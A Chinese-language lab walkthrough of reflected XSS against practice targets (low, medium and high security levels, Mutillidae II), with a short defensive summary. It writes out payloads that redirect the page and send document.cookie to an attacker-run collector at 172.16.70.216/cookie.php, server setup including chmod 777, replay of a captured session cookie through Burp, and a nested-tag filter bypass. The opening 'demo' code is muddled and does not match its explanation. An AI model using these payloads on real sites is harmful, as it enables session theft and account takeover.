概述
用户访问网页中的XSS链接,服务器接受并返回,用户执行反射回来的代码并解析执行
反射型XSS公鸡是一种常见的Web安全漏洞,公鸡者通过构造恶意的URL参数,将恶意脚本注入到目标网页中,当用户点击包含恶意参数的链接时,恶意脚本会被执行,从而导致公鸡者能够获取用户的敏感信息或进行其他恶意操作。
以下是一个反射型XSS公鸡的演示例子:
<!-- 假设目标网页的URL为 http://example.com/search?query= --> <script> // 获取URL参数 var query = decodeURIComponent(window.location.search.replace("?query=", "")); // 在页面中插入恶意脚本 document.write("<h1>搜索结果: " + query + "</h1>"); </script>
在上述例子中,公鸡者构造了一个恶意的URL参数,当用户访问该URL时,恶意脚本会被执行,并将用户的搜索内容插入到页面中。这样,公鸡者就能够获取用户的搜索内容。
为了防止反射型XSS公鸡,开发者应该对用户输入进行严格的过滤和转义,确保用户输入不会被当作脚本执行。常见的防御措施包括使用安全的编码函数对用户输入进行转义,以及使用内容安全策略(Content Security Policy)来限制页面中可以执行的脚本来源。
低安全级别
代码分析
弹框警告
页面重定向
<script>location.href="http://172.16.70.214/mutillidae/robots.txt"</script>
获取cookie
服务端
启动apache服务
service apache2 start
编写cookie接收脚本
修改html和php权限
root@kali:/var/www# chmod 777 html root@kali:/var/www# root@kali:/var/www# cd html/ root@kali:/var/www/html# chmod 777 cookie.php
靶机访问
<script>window.open('http://172.16.70.216/cookie.php?cookie='+document.cookie)</script>
<script>document.location="http://172.16.70.216/cookie.php?cookie="+document.cookie</script>
<script>new Image().src="http://172.16.70.216/cookie.php?cookie="+document.cookie;</script>
cookie查看
通过log
cd /var/log/apache2/ cat access.log
通过文件
cookie.txt
cookie利用
利用思路
在win7靶机端用user账号访问,然后通过日志或者文件查看cookie
之后在kali端用Burp或者Tamper携带win7的cookie访问,查看账号是否user
采用Burp+Cookie利用
采用Tamper利用
cookie=security=low; PHPSESSID=p0e1svvfl7929198je19pq8v26
中安全级别
代码审计
语句利用
<scrip<script>t>alert('xss')</script> // 拼凑成一个可用的标签
tr_replace过滤在之前文件包含章节使用过,绕过方式一样
高安全级别
代码审计
不执行脚本功能,只文本输出,所以基本不会弹窗
Mutillidae II 环境